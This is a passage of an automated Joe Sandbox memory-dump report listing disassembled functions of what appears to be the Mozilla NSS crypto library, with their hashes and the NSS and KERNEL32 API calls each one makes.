Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: f96f3287298f85ebb0947a1d13df1b98c476f9f8e2ed814164dfe5f74455f2cd
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: B131B7B2A001118FD715CF08DC9099AB7E2FF8831872B45B9C8595B711EB71EC55CBE5

Function 6C62DF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6C5B3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5CAE42), ref: 6C5B30AA
Part of subcall function 6C5B3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B30C7
Part of subcall function 6C5B3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5B30E5
Part of subcall function 6C5B3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5B3116
Part of subcall function 6C5B3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5B312B
Part of subcall function 6C5B3090: PK11_DestroyObject.NSS3(?,?), ref: 6C5B3154
Part of subcall function 6C5B3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C62DBBD), ref: 6C62DFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C62DFEE

Part of subcall function 6C5C86D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5C8716
Part of subcall function 6C5C86D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5C8727
Part of subcall function 6C5C86D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5C873B
Part of subcall function 6C5C86D0: PR_Unlock.NSS3(?), ref: 6C5C876F
Part of subcall function 6C5C86D0: PR_SetError.NSS3(00000000,00000000), ref: 6C5C8787

Part of subcall function 6C5EF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5EF854
Part of subcall function 6C5EF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5EF868
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5EF882
Part of subcall function 6C5EF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5EF889
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5EF8A4
Part of subcall function 6C5EF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5EF8AB
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5EF8C9
Part of subcall function 6C5EF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5EF8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C62DBBD), ref: 6C62DFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6C62DBBD), ref: 6C62E007

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: f5dca9dec7338d8e4a770dc03be4588757511d8f265e3c084c4b5c430f77dc9c
Instruction ID: f384212cc7c4f5caeb84c634cb6cb3f8acd688022e025757b31b8bcb1c5ee973
Opcode Fuzzy Hash: f5dca9dec7338d8e4a770dc03be4588757511d8f265e3c084c4b5c430f77dc9c
Instruction Fuzzy Hash: 7B31E7B1A0420197E7109E7AAC84A9B77B89F9530CF040135E909D7B52FF39D918CAEA

Function 6C5A6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5A6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5A6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C5A6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C6C8FE0), ref: 6C5A6CFE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 5286e1fe91d7bb7a87adcf20894c742868fdb8642f4db92f017b1e646fc24c64
Instruction ID: ba0fcf85fbeb23db8f11e5ea3c3536815bbea8867217d333fb1f32e15994aae9
Opcode Fuzzy Hash: 5286e1fe91d7bb7a87adcf20894c742868fdb8642f4db92f017b1e646fc24c64
Instruction Fuzzy Hash: D03183B5A002169FDB08CFA9CC51ABFB7F5EF45248B10443DD905E7750EB319906CBA0

Function 6C6B4F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C6B4F5D
free.MOZGLUE(?), ref: 6C6B4F74
free.MOZGLUE(?), ref: 6C6B4F82
GetLastError.KERNEL32 ref: 6C6B4F90

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 142da99d8e2692dfae1baf08ec433fd39636c66a545b1f438a6970a6c361dd9f
Instruction ID: e79c9f5092d7ccd33a06f6e989f59ddeb5271fe6a6a1bd1b55f291661509f3f8
Opcode Fuzzy Hash: 142da99d8e2692dfae1baf08ec433fd39636c66a545b1f438a6970a6c361dd9f
Instruction Fuzzy Hash: C1310975A002199BDB01CF69DC81BEB73BCEF85358F040225E825B7681DB74E9248799

Function 6C5FDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C5FDDB1,?,00000000), ref: 6C5FDDF4

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C5FDDB1,?,00000000), ref: 6C5FDE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C5FDDB1,?,00000000), ref: 6C5FDE17

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C5FDE80

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: f0bc6ae3589db55f5ab2e51805b94f9153b063025b819466520efc17df9e2742
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 3F31C4B2A017429BE704CF16CC80652F7A4BFA531CB248629D92987B01E7B1E4A9CF91

Function 6C5EFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C5C5ADC,?,00000000,00000001,?,?,00000000,?,6C5BBA55,?,?), ref: 6C5EFE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5EFE5F
PR_Unlock.NSS3(78831D74), ref: 6C5EFEC2
PR_SetError.NSS3(00000000,00000000), ref: 6C5EFED6

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 4344437b61a905d589f33e8def7e47ef95f4b6f251595572d1e852121797a3e4
Instruction ID: 8593dfc853a1b4c63f5cb9df99cd80354b2d2690d65c1436215eddbe2c9ed7c0
Opcode Fuzzy Hash: 4344437b61a905d589f33e8def7e47ef95f4b6f251595572d1e852121797a3e4
Instruction Fuzzy Hash: C3213432A00225ABD7509F65EC447AA77B8BF0935CF040224DD0567E42EB30F828CBD1

Function 6C5F3F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6C5F3440: PK11_GetAllTokens.NSS3 ref: 6C5F3481
Part of subcall function 6C5F3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5F34A3
Part of subcall function 6C5F3440: TlsGetValue.KERNEL32 ref: 6C5F352E
Part of subcall function 6C5F3440: EnterCriticalSection.KERNEL32(?), ref: 6C5F3542
Part of subcall function 6C5F3440: PR_Unlock.NSS3(?), ref: 6C5F355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C5DE80C,00000000,00000000,?,?,?,?,6C5E8C5B,-00000001), ref: 6C5F3FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C5DE80C,00000000,00000000,?,?,?,?,6C5E8C5B,-00000001), ref: 6C5F3FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C5DE80C,00000000,00000000,?,?,?,?,6C5E8C5B,-00000001), ref: 6C5F3FFE
PR_SetError.NSS3 ref: 6C5F401A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
Opcode ID: d14218322f59f2b5728ef8aa713c9a89fac7974b1ddd9f2ef7f5d781ca40ab25
Instruction ID: ded2e119fe10d9eaef8ed1d7da01640fbee18af756e4cb184240be5bb907e8d6
Opcode Fuzzy Hash: d14218322f59f2b5728ef8aa713c9a89fac7974b1ddd9f2ef7f5d781ca40ab25
Instruction Fuzzy Hash: 51318074604704CFD704EF69D98466ABBF4FF88314F01492DD8998BB10EB30E985CB96

Function 6C5E4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C5EB60F,00000000), ref: 6C5E5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C5EB60F,00000000), ref: 6C5E501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C5EB60F,00000000), ref: 6C5E504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C5EB60F,00000000), ref: 6C5E5064

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 4dd01ed9193e500f1efc6b031d9a614af76232937a1465283db3a373372426f5
Instruction ID: 21190f2012d66d6f1645118a33d6c13fadd18a9ab52775f2250e1515f2076731
Opcode Fuzzy Hash: 4dd01ed9193e500f1efc6b031d9a614af76232937a1465283db3a373372426f5
Instruction Fuzzy Hash: 79314DB4A05606DFDB00EF69D88466ABBF4FF48304F108969E859D7B01EB30E894CBD1

Function 6C609F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C60A71A,FFFFFFFF,?,?), ref: 6C609FAB

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C60A71A,6C60A71A,00000000), ref: 6C609FD9

Part of subcall function 6C601340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60136A
Part of subcall function 6C601340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60137E
Part of subcall function 6C601340: PL_ArenaGrow.NSS3(?,6C59F599,?,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?), ref: 6C6013CF
Part of subcall function 6C601340: PR_Unlock.NSS3(?,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C60A71A,6C60A71A,00000000), ref: 6C60A009
PR_SetError.NSS3(FFFFE013,00000000,6C60A71A,6C60A71A,00000000), ref: 6C60A045

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
String ID:
API String ID: 3535121653-0
Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction ID: f003219df74dca915a1b451d64f9163de020c82d221b66a51b64e6890def8468
Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction Fuzzy Hash: 632198B470020A9BF7089F15DD50F66B7A9FF5539CF10C128D81A97781E776D814CB94

Function 6C612DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C612E08

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C612E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C612E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C612E95

Part of subcall function 6C601200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5A88A4,00000000,00000000), ref: 6C601228
Part of subcall function 6C601200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C601238
Part of subcall function 6C601200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5A88A4,00000000,00000000), ref: 6C60124B
Part of subcall function 6C601200: PR_CallOnce.NSS3(6C702AA4,6C6012D0,00000000,00000000,00000000,?,6C5A88A4,00000000,00000000), ref: 6C60125D
Part of subcall function 6C601200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C60126F
Part of subcall function 6C601200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C601280
Part of subcall function 6C601200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C60128E
Part of subcall function 6C601200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C60129A
Part of subcall function 6C601200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6012A1

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 352b6dfa15189dcf7d3b97c5d4cff16135dd683e0d32df833dd81b31c73e32b6
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 57213BB1E443454BEB00CF189D447AA37646F9330DF114269ED086BB52F7B1D599C399

Function 6C5CACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C5CACC2

Part of subcall function 6C5A2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C5A2F0A
Part of subcall function 6C5A2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5A2F1D

Part of subcall function 6C5A2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C5A0A1B,00000000), ref: 6C5A2AF0
Part of subcall function 6C5A2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C5CAD5E

Part of subcall function 6C5E57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C5AB41E,00000000,00000000,?,00000000,?,6C5AB41E,00000000,00000000,00000001,?), ref: 6C5E57E0
Part of subcall function 6C5E57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C5E5843

CERT_DestroyCertList.NSS3(?), ref: 6C5CAD36

Part of subcall function 6C5A2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C5A2F65
Part of subcall function 6C5A2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5A2F83

free.MOZGLUE(?), ref: 6C5CAD4F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 74b44543e78f73fb568e5719f84dee4759e863d3a3314060e57c061d1bd90d32
Instruction ID: 500f4fe6f06bf633f4c699ae4e016a236c193c8fdb19096698d1348a202f086d
Opcode Fuzzy Hash: 74b44543e78f73fb568e5719f84dee4759e863d3a3314060e57c061d1bd90d32
Instruction Fuzzy Hash: BC2192B5E00114CBEB10DFA69C465EE7BB4AF49248F45406CD8096BA00EB31AE55CBA6

Function 6C5F3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5F3C9E
EnterCriticalSection.KERNEL32(?), ref: 6C5F3CAE
PR_Unlock.NSS3(?), ref: 6C5F3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C5F3D02

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 94067ab1c4e9e2d07cf6a343e4f5956443d3aee931cb0184b118c8c272178898
Instruction ID: 230410402d6d0eae6dad8616e513a44c163df15ab2a3448c325181eb7f8cf5ef
Opcode Fuzzy Hash: 94067ab1c4e9e2d07cf6a343e4f5956443d3aee931cb0184b118c8c272178898
Instruction Fuzzy Hash: 0511E979A00204AFEB00EF24DC48E963778EF49368F158564ED1997712DB31ED55CBE1

Function 6C5FECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C5FF0AD,6C5FF150,?,6C5FF150,?,?,?), ref: 6C5FECBA

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C5FECD1

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
